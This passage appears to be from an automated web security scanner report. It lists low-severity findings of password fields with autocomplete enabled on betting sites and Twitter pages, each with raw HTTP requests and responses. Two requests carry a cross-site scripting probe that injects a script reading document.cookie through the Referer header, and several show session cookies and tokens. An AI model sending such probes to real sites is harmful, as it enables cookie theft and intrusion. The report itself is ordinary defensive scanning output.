                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.97. https://scratch.betsson.com/en/Sports/Ready-Set-Go

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Sports/Ready-Set-Go

Issue detail

The page contains a form with the following action URL:
#fallback-url-for-non-javascript-clients
The form contains the following password field with autocomplete enabled:
tbPassword

Request

GET /en/Sports/Ready-Set-Go HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:50:34 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:50:34 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:50:34 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:50:34 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:50:34 GMT
Connection: close
Content-Length: 102712


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.98. https://scratch.betsson.com/en/Sports/Road-Racing

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Sports/Road-Racing

Issue detail

The page contains a form with the following action URL:
#fallback-url-for-non-javascript-clients
The form contains the following password field with autocomplete enabled:
tbPassword

Request

GET /en/Sports/Road-Racing HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:50:28 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:50:28 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:50:28 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:50:28 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:50:27 GMT
Connection: close
Content-Length: 102694


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.99. https://scratch.betsson.com/en/Sports/World-Champions

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Sports/World-Champions

Issue detail

The page contains a form with the following action URL:
#fallback-url-for-non-javascript-clients
The form contains the following password field with autocomplete enabled:
tbPassword

Request

GET /en/Sports/World-Champions HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:50:38 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:50:38 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:50:38 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:50:38 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:50:38 GMT
Connection: close
Content-Length: 102712


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.100. http://twitter.com/PostcodeLottery

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /PostcodeLottery

Issue detail

The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]

Request

GET /PostcodeLottery HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 16 May 2011 11:58:44 GMT
Server: hi
Status: 200 OK
X-Transaction: 1305547124-9250-27328
ETag: "509908394cb0e30c33cd8bdb160b0b2c"
X-Frame-Options: SAMEORIGIN
Last-Modified: Mon, 16 May 2011 11:58:44 GMT
X-Runtime: 0.03576
Content-Type: text/html; charset=utf-8
Content-Length: 59180
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: e61ab982b4aed01008cdec3c1c8138b280a18ccf
Set-Cookie: k=173.193.214.243.1305547124447352; path=/; expires=Mon, 23-May-11 11:58:44 GMT; domain=.twitter.com
Set-Cookie: guest_id=130554712445382826; path=/; expires=Wed, 15 Jun 2011 11:58:44 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCOYurPgvAToHaWQiJWFiMDRlMGMzNDNkYzhh%250AM2RlODFlOGM3MTY2MDI1ZDY2IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--b4682015a7f1885320edf06ef6f2b95fed508082; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="2fd239a8fdac45d1a4e78274d05228d0dffe4f87" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

13.101. http://twitter.com/PrimeScratch

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /PrimeScratch

Issue detail

The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]

Request

GET /PrimeScratch HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 16 May 2011 11:58:44 GMT
Server: hi
Status: 200 OK
X-Transaction: 1305547124-38253-35739
ETag: "de9673ab5bac9a85dedd4caeafe3f4e2"
X-Frame-Options: SAMEORIGIN
Last-Modified: Mon, 16 May 2011 11:58:44 GMT
X-Runtime: 0.00948
Content-Type: text/html; charset=utf-8
Content-Length: 48033
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 902d2adaaadcd4c50d07311d00ce36d2fb541db9
Set-Cookie: k=173.193.214.243.1305547124198035; path=/; expires=Mon, 23-May-11 11:58:44 GMT; domain=.twitter.com
Set-Cookie: guest_id=130554712420572627; path=/; expires=Wed, 15 Jun 2011 11:58:44 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCO4trPgvAToHaWQiJWYxODc0MTk2MjM0Mjgw%250AZDhiYTA3NjMyOGM0NzNiN2M5IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--fa86eb668ddb62cafcb9697b322fc64f12da4063; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="63701fc59bc9d88165cd01f8ae687ce841ff52b3" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

13.102. http://twitter.com/crazyscratch

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /crazyscratch

Issue detail

The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]

Request

GET /crazyscratch HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 16 May 2011 11:58:44 GMT
Server: hi
Status: 200 OK
X-Transaction: 1305547124-24586-58491
ETag: "d6f21384f100129309a8c66fccb1ac7d"
X-Frame-Options: SAMEORIGIN
Last-Modified: Mon, 16 May 2011 11:58:44 GMT
X-Runtime: 0.00873
Content-Type: text/html; charset=utf-8
Content-Length: 47490
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: e6ed5ddb8758b31406ef9cd22c304eb256d1c6ac
Set-Cookie: k=173.193.214.243.1305547124050568; path=/; expires=Mon, 23-May-11 11:58:44 GMT; domain=.twitter.com
Set-Cookie: guest_id=130554712405667445; path=/; expires=Wed, 15 Jun 2011 11:58:44 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCFotrPgvAToHaWQiJTAzZjUxZWIyNmM4ZGVi%250AMDllY2QyMDI3YjhmMWQ2M2JkIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--593c1ebfebc2e5eb6e907ba040cf743ef29a279e; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="b39f3807f180855615e37bb5aaae3aa3e48eb171" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

13.103. http://twitter.com/ukscratch

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /ukscratch

Issue detail

The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]

Request

GET /ukscratch HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 16 May 2011 11:58:43 GMT
Server: hi
Status: 200 OK
X-Transaction: 1305547123-20423-53593
ETag: "ab5f42b56a9a549a2367ddad1fefb082"
X-Frame-Options: SAMEORIGIN
Last-Modified: Mon, 16 May 2011 11:58:43 GMT
X-Runtime: 0.00833
Content-Type: text/html; charset=utf-8
Content-Length: 23894
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 37f116a865ccfb3e22b1c38efd73db8ddb6854e5
Set-Cookie: k=173.193.214.243.1305547123976604; path=/; expires=Mon, 23-May-11 11:58:43 GMT; domain=.twitter.com
Set-Cookie: guest_id=130554712398340369; path=/; expires=Wed, 15 Jun 2011 11:58:43 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCBAtrPgvAToHaWQiJTA2ZmQ5MzM0MjQxNzI4%250ANWRmZTU4MGM2YzQ1ZjNiNWRjIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a6c952001d0836b81d2cff483ca79969f1db4eaf; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="0992a92ca037a74ac2bf78aa2e8676a5ca4b8a41" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

13.104. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /WebSite/Affiliates/login.aspx

Issue detail

The page contains a form with the following action URL: login.aspx?CMI=1

The form contains the following password field with autocomplete enabled: txtPassword

Request

GET /WebSite/Affiliates/login.aspx?CMI=1 HTTP/1.1
Host: www.aspireaffiliates.com
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?CMI=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 16 May 2011 12:46:55 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 5490


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><title>
...[SNIP]...
<body style="margin:0px;">
<form name="form1" method="post" action="login.aspx?CMI=1" id="form1">
<div>
...[SNIP]...
<td>
<input name="txtPassword" type="password" maxlength="16" id="txtPassword" tabindex="51" class="AffiliatesHeaderLoginTextbox" />
</td>
...[SNIP]...

13.105. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /WebSite/Affiliates/login.aspx

Issue detail

The page contains a form with the following action URL: login.aspx

The form contains the following password field with autocomplete enabled: txtPassword

Request

GET /WebSite/Affiliates/login.aspx HTTP/1.1
Host: www.aspireaffiliates.com
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 16 May 2011 12:47:06 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 5484


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><title>
...[SNIP]...
<body style="margin:0px;">
<form name="form1" method="post" action="login.aspx" id="form1">
<div>
...[SNIP]...
<td>
<input name="txtPassword" type="password" maxlength="16" id="txtPassword" tabindex="51" class="AffiliatesHeaderLoginTextbox" />
</td>
...[SNIP]...

13.106. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /WebSite/Affiliates/login.aspx

Issue detail

The page contains a form with the following action URL: login.aspx?a034a%5c

The form contains the following password field with autocomplete enabled: txtPassword

Request

GET /WebSite/Affiliates/login.aspx?a034a\ HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?a034a%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E761a7e15528=1

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 16 May 2011 12:24:01 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 5493


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><title>
...[SNIP]...
<body style="margin:0px;">
<form name="form1" method="post" action="login.aspx?a034a%5c" id="form1">
<div>
...[SNIP]...
<td>
<input name="txtPassword" type="password" maxlength="16" id="txtPassword" tabindex="51" class="AffiliatesHeaderLoginTextbox" />
</td>
...[SNIP]...

13.107. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /WebSite/Affiliates/login.aspx

Issue detail

The page contains a form with the following action URL: login.aspx?d0cc2%5c

The form contains the following password field with autocomplete enabled: txtPassword

Request

GET /WebSite/Affiliates/login.aspx?d0cc2\ HTTP/1.1
Host: www.aspireaffiliates.com
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 16 May 2011 12:46:01 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 5493


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><title>
...[SNIP]...
<body style="margin:0px;">
<form name="form1" method="post" action="login.aspx?d0cc2%5c" id="form1">
<div>
...[SNIP]...
<td>
<input name="txtPassword" type="password" maxlength="16" id="txtPassword" tabindex="51" class="AffiliatesHeaderLoginTextbox" />
</td>
...[SNIP]...

13.108. http://www.bet365.com/extra/en/betting/in-play

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bet365.com
Path:   /extra/en/betting/in-play

Issue detail

The page contains a form with the following action URL: /extra/en/betting/in-play/Default.aspx

The form contains the following password field with autocomplete enabled: ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword

Request

GET /extra/en/betting/in-play HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:31:22 GMT
X-AspNet-Version: 2.0.50727
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 13:31:22 GMT; path=/
Set-Cookie: ASP.NET_SessionId=unylycjqefpfxs45dlzrct45; path=/; HttpOnly
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:31:22 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:31:22 GMT; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:31:22 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 102612


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_Html" xmlns="http://www.w3.org/1999/xhtml">
<head id="
...[SNIP]...
<div id="pageContainer" style="float:none;">
<form name="aspnetForm" method="post" action="/extra/en/betting/in-play/Default.aspx" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'ctl00_HeaderPlaceHolder_HeaderControl_Login_Go')" id="aspnetForm">
<div>
...[SNIP]...
ssword&quot;, 2);" OnFocus="PasswordBehaviour(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;, &quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword&quot;, 2);" /><input name="ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword" type="password" id="ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword" tabindex="3" class="textbox" OnBlur="PasswordBehaviour(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;, &quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword&quot;, 1);" /></div>
...[SNIP]...

13.109. http://www.bet365.com/extra/en/betting/live-streaming

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bet365.com
Path:   /extra/en/betting/live-streaming

Issue detail

The page contains a form with the following action URL: /extra/en/betting/live-streaming/Default.aspx

The form contains the following password field with autocomplete enabled: ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword

Request

GET /extra/en/betting/live-streaming HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:31:24 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 13:31:23 GMT; path=/
Set-Cookie: ASP.NET_SessionId=arbxtv45ukmqrsq55mwos0iy; path=/; HttpOnly
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:31:23 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:31:23 GMT; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:31:24 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 101179


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_Html" xmlns="http://www.w3.org/1999/xhtml">
<head id="
...[SNIP]...
<div id="pageContainer" style="float:none;">
<form name="aspnetForm" method="post" action="/extra/en/betting/live-streaming/Default.aspx" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'ctl00_HeaderPlaceHolder_HeaderControl_Login_Go')" id="aspnetForm">
<div>
...[SNIP]...
ssword&quot;, 2);" OnFocus="PasswordBehaviour(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;, &quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword&quot;, 2);" /><input name="ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword" type="password" id="ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword" tabindex="3" class="textbox" OnBlur="PasswordBehaviour(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;, &quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword&quot;, 1);" /></div>
...[SNIP]...

13.110. http://www.bet365.com/extra/en/mobile/introduction/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bet365.com
Path:   /extra/en/mobile/introduction/

Issue detail

The page contains a form with the following action URL: /extra/en/mobile/introduction/Default.aspx

The form contains the following password field with autocomplete enabled: ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword

Request

GET /extra/en/mobile/introduction/ HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:31:25 GMT
X-AspNet-Version: 2.0.50727
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 13:31:25 GMT; path=/
Set-Cookie: ASP.NET_SessionId=3ysuis55m3k5e4u42bup5i55; path=/; HttpOnly
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:31:25 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:31:25 GMT; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:31:25 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 65383


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_Html" xmlns="http://www.w3.org/1999/xhtml">
<head id="
...[SNIP]...
<div id="pageContainer" style="float:none;">
<form name="aspnetForm" method="post" action="/extra/en/mobile/introduction/Default.aspx" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'ctl00_HeaderPlaceHolder_HeaderControl_Login_Go')" id="aspnetForm">
<div>
...[SNIP]...
